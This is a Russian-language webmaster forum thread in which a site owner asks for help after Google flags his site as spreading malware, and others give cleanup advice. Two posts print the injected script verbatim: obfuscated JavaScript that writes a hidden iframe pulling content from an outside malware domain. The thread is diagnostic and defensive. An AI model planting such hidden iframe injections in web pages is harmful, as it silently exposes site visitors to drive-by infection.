X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Проблема с вирусом на сайте!, нужна срочно помощь...
Alik
Alik
Topic Starter сообщение 9.9.2010, 20:35; Ответить: Alik
Сообщение #1


Участник
***

Группа: User
Сообщений: 154
Регистрация: 4.6.2010
Поблагодарили: 31 раз
Репутация:   0  


Здравствуйте всем! У меня огромная проблема с сайтом. Гугл жалуется на него, говорит,что вирус на сайте. Сам я проверил на вирусы сайт, не нашел ничего. Помогите,пожалуйста,решить вопрос. Это уже происходит неоднократно.
Вот сайт cartrade63.ru
1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Man1keN
Man1keN
сообщение 9.9.2010, 20:40; Ответить: Man1keN
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 316
Регистрация: 31.8.2009
Из: Санкт-Петербург
Поблагодарили: 158 раз
Репутация:   22  


<script language=JavaScript>jhtm='%3Ciframe%20src%3D%22http%3A//qwertyrewq.in/tmp/iframe.php%22%20width%3D2%20height%3D2%20style%3D%22visibility%3A%20hidden%22%3E%3C/iframe%3E';crypo=unescape(jhtm);document.write(crypo);</script>

Что это?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rjksdfhe
rjksdfhe
сообщение 9.9.2010, 20:41; Ответить: rjksdfhe
Сообщение #3


Straight arms
*******

Группа: Active User
Сообщений: 2760
Регистрация: 21.4.2009
Из: Мытищи, МО, РФ
Поблагодарили: 1111 раз
Репутация:   163  


Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
Веб-сайт cartrade63.ru содержит элементы с сайта qwertyrewq.in, на котором, судя по всему, размещено вредоносное ПО – программы, которые могут нанести вред вашему компьютеру или выполнять действия без вашего согласия. Даже простое посещение сайта, на котором размещено вредоносное ПО, может привести к заражению вашего компьютера.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
X-Natali
X-Natali
сообщение 9.9.2010, 22:36; Ответить: X-Natali
Сообщение #4


Частый гость
**

Группа: User
Сообщений: 77
Регистрация: 23.4.2009
Поблагодарили: 5 раз
Репутация:   1  


(Alik @ 9.9.2010, 19:35) *
Здравствуйте всем! У меня огромная проблема с сайтом. Гугл жалуется на него, говорит,что вирус на сайте. Сам я проверил на вирусы сайт, не нашел ничего. Помогите,пожалуйста,решить вопрос. Это уже происходит неоднократно.
Вот сайт cartrade63.ru


Вот тут антивирусная сигнализация писала о похожей ситуации. На этом сайте описаны примеры кодов которые надо искать, а также страницы - index.php, main.tpl и т.д. в которые внедряется вредоносный код.
"Это уже происходит неоднократно. " - проверяй комп на вирусы, а главное меняй пароли к админкам сайта, хоста и главное фтп - через украденный от него пароль и заражается сайт.

Вот ещё важно - В онлайн-сканирование не входят алгоритмы поведенческого анализа, доступные только в рамках услуги "антивирусная сигнализация". И в инструментах для веб-мастеров Google (аккаунт наверное есть и сайт туда добавлен?), будет адрес страницы на которой обнаружен код и сам код. Надо найти и удалить. Но стоит проверить и другие.

Сообщение отредактировал X-Natali - 9.9.2010, 22:38
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
KipiaSoft
KipiaSoft
сообщение 9.9.2010, 22:38; Ответить: KipiaSoft
Сообщение #5


Старожил
******

Группа: Active User
Сообщений: 2096
Регистрация: 16.11.2009
Из: Волгоград
Поблагодарили: 632 раза
Репутация:   74  


Да, и не забудь права доступа на файлы index поставить 444 (0444)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
X-Natali
X-Natali
сообщение 9.9.2010, 22:49; Ответить: X-Natali
Сообщение #6


Частый гость
**

Группа: User
Сообщений: 77
Регистрация: 23.4.2009
Поблагодарили: 5 раз
Репутация:   1  


(KipiaSoft @ 9.9.2010, 21:38) *
Да, и не забудь права доступа на файлы index поставить 444 (0444)


Смотря на каком движке сайт. В DLE - в main.tpl и в папке engine джава скриптов могут навставлять.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Alik
Alik
Topic Starter сообщение 9.9.2010, 22:51; Ответить: Alik
Сообщение #7


Участник
***

Группа: User
Сообщений: 154
Регистрация: 4.6.2010
Поблагодарили: 31 раз
Репутация:   0  


Расписали все хорошо,спасибо. Но кто может взяться за это,сделать все как нужно? за вознаграждение конечно.


(X-Natali @ 9.9.2010, 22:49) *
Смотря на каком движке сайт. В DLE - в main.tpl и в папке engine джава скриптов могут навставлять.

движок самописный.

Сообщение отредактировал Alik - 9.9.2010, 22:53
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Alexdm
Alexdm
сообщение 9.9.2010, 22:54; Ответить: Alexdm
Сообщение #8


Участник
***


Группа: User
Сообщений: 103
Регистрация: 28.2.2009
Из: г. Анапа
Поблагодарили: 34 раза
Репутация:   8  


(Alik @ 9.9.2010, 20:35) *
Здравствуйте всем! У меня огромная проблема с сайтом.

Делайте полный бекап всех файлов с расширением .js и .php, насколько я помню вирус полностью меняет их на свои или в конец дописывает свой скрипт. Ну и нужно искать слабое место, вам где то шелл заливают.   
Еще если используете Total Commander удалите его и установите с оф. сайта. Без всяких crack`ов и т.д.
P.S. мне на сайт, каждый день в течение недели, а то и больше всякие вирусы пихали, сделал все что описал выше перестали, может надоело им, ведь я через 10-15 минут максимум делал бекап, а может и действительно исправил..

Сообщение отредактировал Alexdm - 9.9.2010, 22:59


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
X-Natali
X-Natali
сообщение 10.9.2010, 8:18; Ответить: X-Natali
Сообщение #9


Частый гость
**

Группа: User
Сообщений: 77
Регистрация: 23.4.2009
Поблагодарили: 5 раз
Репутация:   1  


(Alik @ 9.9.2010, 21:51) *
Расписали все хорошо,спасибо. Но кто может взяться за это,сделать все как нужно? за вознаграждение конечно.
движок самописный.


Как вариант тут помогут.

Если сайт был бы у них на антивирусной сигнализации три месяца (100 руб.\мес.) - очистка бесплатно - это тоже как вариант.

(Man1keN @ 9.9.2010, 19:40) *
<script language=JavaScript>jhtm='%3Ciframe%20src%3D%22http%3A//qwertyrewq.in/tmp/iframe.php%22%20width%3D2%20height%3D2%20style%3D%22visibility%3A%20hidden%22%3E%3C/iframe%3E';crypo=unescape(jhtm);document.write(crypo);</script>

Что это?


Это и есть зловредный код.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
X-Natali
X-Natali
сообщение 11.9.2010, 9:11; Ответить: X-Natali
Сообщение #10


Частый гость
**

Группа: User
Сообщений: 77
Регистрация: 23.4.2009
Поблагодарили: 5 раз
Репутация:   1  


Список наиболее часто обнаруживаемых вирусов на сайтах.

Сообщение отредактировал X-Natali - 11.9.2010, 9:25
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) ALFAcoins.com - Приём криптовалюты на вашем сайте
17 ALFAcoins 3646 Вчера, 23:07
автор: ALFAcoins
Открытая тема (нет новых ответов) Как правильно сделать категории на сайте?
Хелппп!!!
5 norino 624 Вчера, 16:28
автор: One_on_One
Открытая тема (нет новых ответов) Размещу Вашу статью с ссылкой на сайте с Тиц 50 навсегда
11 vyacheslav333 1289 9.12.2017, 22:16
автор: Мамай
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
23 PostBrigada 3338 9.12.2017, 15:49
автор: Vmir
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
13 maxim_krasovskiy 2666 4.12.2017, 17:09
автор: maxim_krasovskiy


 



RSS Текстовая версия Сейчас: 12.12.2017, 3:11
Дизайн